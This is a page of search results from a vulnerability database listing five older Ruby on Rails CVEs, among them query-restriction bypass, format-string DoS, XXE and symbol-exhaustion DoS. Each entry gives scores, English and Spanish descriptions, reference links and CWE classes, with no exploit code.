Page 14 of 112 results (0.008 seconds)

CVSS: 6.4EPSS: 0%CPEs: 108EXPL: 0

actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before 3.2.16 and 4.x before 4.0.2 does not properly consider differences in parameter handling between the Active Record component and the JSON implementation, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks or trigger missing WHERE clauses via a crafted request that leverages (1) third-party Rack middleware or (2) custom Rack middleware. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-0155. actoinpack/lib/action_dispatch/http/request.rb en Ruby on Rails anteriores a 3.2.16 y 4.x anteriores a 4.0.2 no considera correctamente las diferencias en la gestión de parámetros entre el componente Active Record y la implementación de JSON, lo cual permite a atacantes remotos sortear restricciones de consultas a la base de datos y ejecutar comprobaciones NULL o provocar falta de cláusulas WHERE a través de una petición manipulada que aprovecha (1) middleware Rack de terceros o (2) middleware Rack propio. NOTA: esta vulnerabilidad existe debido a una corrección incompleta de CVE-2013-0155. • http://lists.opensuse.org/opensuse-updates/2013-12/msg00079.html http://lists.opensuse.org/opensuse-updates/2013-12/msg00081.html http://lists.opensuse.org/opensuse-updates/2013-12/msg00082.html http://lists.opensuse.org/opensuse-updates/2014-01/msg00003.html http://rhn.redhat.com/errata/RHSA-2013-1794.html http://rhn.redhat.com/errata/RHSA-2014-0008.html http://rhn.redhat.com/errata/RHSA-2014-0469.html http://weblog.rubyonrails.org/2013/12/3/Rails_3_2_16_and_4_0_2_ • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') CWE-264: Permissions, Privileges, and Access Controls •

CVSS: 4.3EPSS: 1%CPEs: 5EXPL: 1

Multiple format string vulnerabilities in log_subscriber.rb files in the log subscriber component in Action Mailer in Ruby on Rails 3.x before 3.2.15 allow remote attackers to cause a denial of service via a crafted e-mail address that is improperly handled during construction of a log message. Múltiples vulnerabilidadews de format string en archivos log_subscriber.rb en el componente de suscripción de log de Action Mailer en Ruby on Rails 3.x anterior a 3.2.15 permite a atacantes remotos causar una denegación de servicio a través de una dirección de email manipulada que es manejada de manera inapropiada durante la construcción de un mensaje de log. • http://lists.opensuse.org/opensuse-updates/2013-12/msg00091.html http://lists.opensuse.org/opensuse-updates/2013-12/msg00094.html http://lists.opensuse.org/opensuse-updates/2014-01/msg00003.html http://www.debian.org/security/2014/dsa-2887 http://www.debian.org/security/2014/dsa-2888 https://groups.google.com/forum/message/raw?msg=ruby-security-ann/yvlR1Vx44c8/elKJkpO2KVgJ • CWE-134: Use of Externally-Controlled Format String •

CVSS: 6.4EPSS: 0%CPEs: 104EXPL: 1

The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x, and 3.2.x does not ensure that the declared data type of a database column is used during comparisons of input values to stored values in that column, which makes it easier for remote attackers to conduct data-type injection attacks against Ruby on Rails applications via a crafted value, as demonstrated by unintended interaction between the "typed XML" feature and a MySQL database. El componente Active Record en Ruby on Rails 2.3.x, 3.0.x, 3.1.x, y 3.2.x, no asegura que el tipo de dato declarado de una columna de la base de datos sea usado durante la comparación con los valores de entrada almacenados en dicha columna, lo que facilita a atacantes remotos a llevar a cabo ataques de inyección de tipos de datos (data-types) contra las aplicaciones de Ruby on Rails a través de un valor manipulado, como se ha demostrado mediante una transacción entre la característica "typed XML" y la base de datos de MySQL. • http://openwall.com/lists/oss-security/2013/02/06/7 http://openwall.com/lists/oss-security/2013/04/24/7 http://pl.reddit.com/r/netsec/comments/17yajp/mysql_madness_and_rails http://www.phenoelit.org/blog/archives/2013/02/index.html https://gist.github.com/dakull/5442275 https://groups.google.com/group/rubyonrails-security/msg/1f3bc0b88a60c1ce?dmode=source&output=gplain • CWE-20: Improper Input Validation •

CVSS: 5.8EPSS: 1%CPEs: 47EXPL: 0

The ActiveSupport::XmlMini_JDOM backend in lib/active_support/xml_mini/jdom.rb in the Active Support component in Ruby on Rails 3.0.x and 3.1.x before 3.1.12 and 3.2.x before 3.2.13, when JRuby is used, does not properly restrict the capabilities of the XML parser, which allows remote attackers to read arbitrary files or cause a denial of service (resource consumption) via vectors involving (1) an external DTD or (2) an external entity declaration in conjunction with an entity reference. El backend ActiveSupport::XmlMini_JDOM en lib/active_support/xml_mini/jdom.rb en el componente Active Support en Ruby on Rails v3.0.x y 3.1.x anterior a v3.1.12 y v3.2.x anterior a v3.2.13, cuando se usa JRuby, no restringe adecuadamente las capacidades del validador XML, lo que permite a atacantes remotos leer archivos de su elección o provocar una denegación de servicio (consumo de recursos) a través de vectores que involucran (1) una TDT externa o (2) una declaración de entidad externa junto con una referencia a una entidad. • http://lists.apple.com/archives/security-announce/2013/Jun/msg00000.html http://lists.apple.com/archives/security-announce/2013/Oct/msg00006.html http://support.apple.com/kb/HT5784 http://weblog.rubyonrails.org/2013/3/18/SEC-ANN-Rails-3-2-13-3-1-12-and-2-3-18-have-been-released https://groups.google.com/group/rubyonrails-security/msg/6c2482d4ed1545e6?dmode=source&output=gplain • CWE-20: Improper Input Validation •

CVSS: 5.0EPSS: 8%CPEs: 62EXPL: 0

The Active Record component in Ruby on Rails 2.3.x before 2.3.18, 3.1.x before 3.1.12, and 3.2.x before 3.2.13 processes certain queries by converting hash keys to symbols, which allows remote attackers to cause a denial of service via crafted input to a where method. El componente Active Record en Ruby on Rails v2.3.x anterior a v2.3.18, v3.1.x anterior a v3.1.12, y v3.2.x anterior a v3.2.13, procesa determinadas consultas mediante la conversión de los hash de las claves a símbolos, lo que permite a atacantes remotos provocar una denegación de servicio a través de una entrada manipulada al método "where". A flaw was found in the way Ruby on Rails handled hashes in certain queries. A remote attacker could use this flaw to perform a denial of service (resource consumption) attack by sending specially crafted queries that would result in the creation of Ruby symbols, which were never garbage collected. • http://lists.apple.com/archives/security-announce/2013/Jun/msg00000.html http://lists.apple.com/archives/security-announce/2013/Oct/msg00006.html http://lists.opensuse.org/opensuse-updates/2013-04/msg00070.html http://lists.opensuse.org/opensuse-updates/2013-04/msg00071.html http://lists.opensuse.org/opensuse-updates/2013-04/msg00075.html http://lists.opensuse.org/opensuse-updates/2013-04/msg00078.html http://lists.opensuse.org/opensuse-updates/2013-04/msg00079.html http://rhn.redhat.com&#x • CWE-20: Improper Input Validation CWE-400: Uncontrolled Resource Consumption •